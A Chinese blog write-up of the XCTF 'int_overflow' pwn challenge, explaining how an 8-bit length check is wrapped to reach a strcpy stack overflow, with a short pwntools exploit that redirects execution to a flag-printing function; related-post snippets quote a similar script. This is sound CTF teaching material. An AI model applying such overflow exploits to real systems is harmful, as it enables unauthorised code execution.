int_overflow writeup

最新推荐文章于 2023-07-29 00:14:43 发布
最新推荐文章于 2023-07-29 00:14:43 发布
阅读量916 收藏 1
点赞数 1
分类专栏: pwn 攻防世界pwn题wp
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43394612/article/details/85957193
版权

做了半天,没注意是整型溢出。。。

拿到题目检查下防护:
在这里插入图片描述
随便运行下:
在这里插入图片描述
放到ida里看下:
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
题目对输入的password的长度进行了检查,只能在4到8范围内。
在strcpy处有溢出,想要进行溢出就必须绕过v3的检查。
在这里插入图片描述
发现v3是8位无符号整数,则最大只能是255。
但是read函数能读取的长度是0x199,远大于255,那就可以进行整型溢出,让passwd的长度是 260到264就可以了。

程序本身段有system(“cat flag”),则可以将返回地址覆盖到这里来。
在这里插入图片描述
exp如下:

from pwn import*

a=remote("111.198.29.45","32363")

a.recvuntil("Your choice:")

a.send("1\n")

a.recvuntil("\n")

a.send("a\n")

a.recvuntil("\n")

payload='A'*(0x14+4)+p32(0x0804868B)

payload+= 'A'*(260-len(payload))

a.sendline(payload)

print a.recvall()
dittozzz
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTF|pwn栈溢出题目int_overflow解题思路及个人总结
skyattractive的博客
05-31 2204
CTF|pwn栈溢出题目int_overflow解题思路及个人总结 解题思路 拿到题目,标题是int_overflow 指可能是某个int型变量存在栈溢出,留意下 老规矩将题目拖到IDA放入ubuntu中查看相关信息 * stack/canary保护没开 ubuntu运行一下 简单的选择登陆 输入账号密码 返回结果 拖入IDA 反编译 查看main函数 进入login函数 login中定义两个变量buf和s,所给的栈的大小都很大,不存在栈溢出 我们继续进入check_passwd函数 这个函数只要
python3的位移操作
phymat.nico的专栏
04-29 795
因为要将js的一个签名算法移植到python上,遇到一些麻烦。 int无限宽度,不会溢出 算法中需要用到了32位int的溢出来参与运算,但是python的int是不会溢出的,达到界限后会自己转为long,所以很麻烦。 #使用-342686650: ret = 123456789 << 20 print(ret) 得到结果129453825982464 print(bin(ret...
攻防世界 int_overflow 超超超详细
PushSafe
10-23 2619
pwn纯新手教程 如有错误的地方 希望各位大佬们指出. 整数溢出 int_overflow 整数分为有符号(int)和无符号(unsigned int)两种类型 有符号数以最高位作为其符号位 即正整数最高位为 1,负数为 0 无符号数取值范围为非负数 常见各类型占用字节数如下: 类型 字节 取值范围 int 4 -2147483648~2147483647 short int 2
CTF PWN-攻防世界Overflow整数溢出漏洞
最新发布
道阻且长,行则将至。
07-29 1444
本文学习了缓冲区溢出漏洞常见的一种场景:整数溢出。一旦不认真考虑整数变量的范围,此类漏洞缺陷很容易在程序员的编码过程中发生,这也是安全工作人员需要注意审计的地方。
xctf学习之intoverflow
neuisf的博客
01-11 507
此题题目为intoverflow,提示整数溢出,IDA阅读伪代码,发现Success条件是输入password长度为[3,8),而要程序中有个函数what_is_this,功能是cat flag,所以要想获取flag,需要让程序运行此函数,而程序的运行并没有调用此函数,因此,必须溢出。存储输入password长度的变量是短整型,即8位二进制数,范围[0,255],当值大于255时,发生溢出,如25...
2015_ransomware_writeup
06-23
周末勒索软件分析上周,我妻子的一位同事设法捕获了一个垃圾勒索软件; 我相信她是从一封与此类似的电子邮件中得到的: 我们公司的快递员无法派送包裹。 REASON: Postal code contains an error.DELIVERY STATUS: ...
2018nsec crypto_leak writeup代码
08-24
这篇writeup涉及的是2018年网络安全挑战赛(CTF)中的一个密码学题目——Crypto Leak。Crypto Leak通常是一个涉及密码分析、加密算法漏洞利用或密钥恢复的问题。在这个特定的情况下,我们有四个文件: 1. **...
PracticalML_writeup
06-28
《实用ML_writeup》是关于机器学习(Machine Learning, ML)实践的一份详细总结,主要以R语言为工具进行讲解。R语言是一种广泛应用于统计分析、数据可视化和机器学习的编程语言,它拥有丰富的库和工具,使得数据分析...
ReverseRSA_writeup_rsa_appprivatekey_解密_
09-29
在“writeup_rsa_appprivatekey”中,作者可能详细记录了整个解密过程,包括所采用的策略、遇到的挑战以及最终的解决方案。这样的WriteUp对于学习者来说极其宝贵,因为它不仅展示了理论知识,还提供了实际问题解决的...
攻防世界_pwn int_overflow(萌新版)
TedLau的博客
02-24 477
首发于鄙人博客:传送门 0x00 前言 重刷攻防世界,本人纯萌新,在本次刷题过程中,不能再想之前那样,做过就忘,我打算将我的思路尽可能的写成文章发在网站。 0x10 步骤 file与checksec步骤已省略 根据反汇编的意思,便可以知道buf的长度比dest的长度长,所以在strcpy的时候会发生溢出现象。 而如果我们的s的长度在3和8之间,那么我们便无法使得s...
[攻防世界 pwn]——int_overflow
Y_peak的博客
02-19 185
[攻防世界 pwn]——int_overflow 题目地址: https://adworld.xctf.org.cn/ 题目: checksec一下,开启了NX 在IDA中看看, 发现了后面函数和可以gets函数, 不过可惜这个gets函数无法栈溢出。不过我们看到在check_passwd函数中有strcpy函数, dest是可以栈溢出的, 不过前题是我们可以绕过检查。 看了下 , 判断的v3是储存在al这个8位寄存器中, 也就是一个字节。当然也可以从_int8看出来是一个字节 0~255。所
php整数溢出 ctf,经典整数溢出漏洞示例 XCTF int_overflow
weixin_42516581的博客
03-26 1326
原标题:经典整数溢出漏洞示例 XCTF int_overflow 本文为看雪论坛优秀文章看雪论坛作者ID:IS信息整数溢出原理整数分为有符号和无符号两种类型,有符号数以最高位作为其符号位,即正整数最高位为1,负数为0,无符号数取值范围为非负数,常见各类型占用字节数如下: 对于unsigned short int类型的两个变量var1、var2,假定取值var1 = 1,var2 = 65537。 ...
攻防世界-pwn新手区-int_overflow
CHAWUCIREN1的博客
08-10 251
看题目就知道是整形溢出 运行一下 检查一下保护机制 丢入32位ida里面 发现一个函数 可以通过覆盖跳转到这个函数就可以拿到flag system_addr = 0x804868B check_passwd处有一个判定,输入的数字要在3和8之间否则就直接退出 在这里需要说明一下,这个unsigned int就是无符号的整型,我们要知道,在计算机中,所有的数据指令都是以二进制的形式存在的,010101这样,那么正负数怎么存在呢,这里就有一个符号位,一般是在一段数据的第一个位置 比如260的十六进制
Int如何判断overflow
qq_41814546的博客
03-21 1685
int   int型的数值范围是 -2147483648~2147483647即32bit,范围总大小为2^32,那么如何通过判断一个整形是否(表示将会,作为整型它已经不能在int范围之外)overflow?解决办法:首先应从增长方式来看,拟定相应的算法进行判断 我在问题中遇到的增长方式是'添位':预测添位后的高位并且对末位单独判断,间接地使“未来”的整数判断是否overflow?if (res ...
GJCTF 官方WP PWN部分
热门推荐
单核CPU的小朋友的博客
12-02 3万+
GJCTF 官方WP PWN部分 1、题目链接:http://www.czlgjbbq.top/GJCTF/pwn_stack 连接方式:nc 188.131.185.193 50000 逆向分析:使用IDA32打开。 定位MAIN函数,F5看源码。很容易发现存在危险函数strcpy,并存在溢出漏洞。v5在这里是ID,v4在这里是name,程序我们需要通过覆盖name来让ID为1000,从而...
2019.7.20 功放世界int_overflow
DSR446的博客
07-24 249
① ② ③这里 read也存在一个栈溢出的漏洞,请自己尝试是否可以从这里入手() ④strcpy的作用是将后面s中字符串拷贝到前面&dest中去。 ⑤发现v3是8位无符号整数,则最大只能是255。 但是read函数能读取的长度是0x199,远大于255,那就可以进行整型溢出,让passwd的长度是 260到264就可以了。(260264是理论上的,但实操中是259263,我还没弄清除...
xctf int_overflow
pondzhang的专栏
12-09 111
from pwn import * #p = process('./int_overflow') p = remote("220.249.52.133",54612) p.recvuntil('Your choice:') p.sendline('1') p.recvuntil('username:\n') p.sendline('1') p.recvuntil('passwd:\n') payload = '\x04'*24 + p32(0x0804868B) + 'c'*(260-28) #gdb.
一款效率神器Ditto
技术宅,专注云原生、Go、Linux、Java等技术分享,原创文章、效率工具、实战解决方案!关注我,了解互联网动态,学 IT 不迷路
06-25 2303
一款效率神器Ditto
php upload ctf,强网杯CTF防御赛ez_upload Writeup
05-14
首先,我们需要分析题目所提供的代码: ... error_reporting(0); if ($_FILES["upload"]["error"] > 0) { echo "Error: " . $_FILES["upload"]["error"] .... echo "Upload: " .... echo "Type: " .... echo "Size: " ....

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值